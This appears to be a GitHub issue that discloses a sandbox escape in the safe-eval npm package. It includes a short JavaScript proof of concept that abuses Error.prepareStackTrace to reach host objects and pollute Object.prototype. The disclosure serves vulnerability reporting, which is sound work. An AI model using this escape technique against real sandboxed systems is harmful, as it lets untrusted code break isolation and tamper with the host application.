Open seongil-wi opened 1 year ago
Hello, we found a sandbox escape vulnerability in the latest version of safe-eval.
```js
var safeEval = require('safe-eval')

let code = `
(function() {
  Error.prepareStackTrace = (_, c) => c.map(c => c.getThis()).find(a => a);
  ret = (new Error()).stack;
  ret.__proto__.polluted = "ret.__proto__.polluted";
})()
`

safeEval(code);
const polluted_result = {}["polluted"];
console.log(polluted_result);
```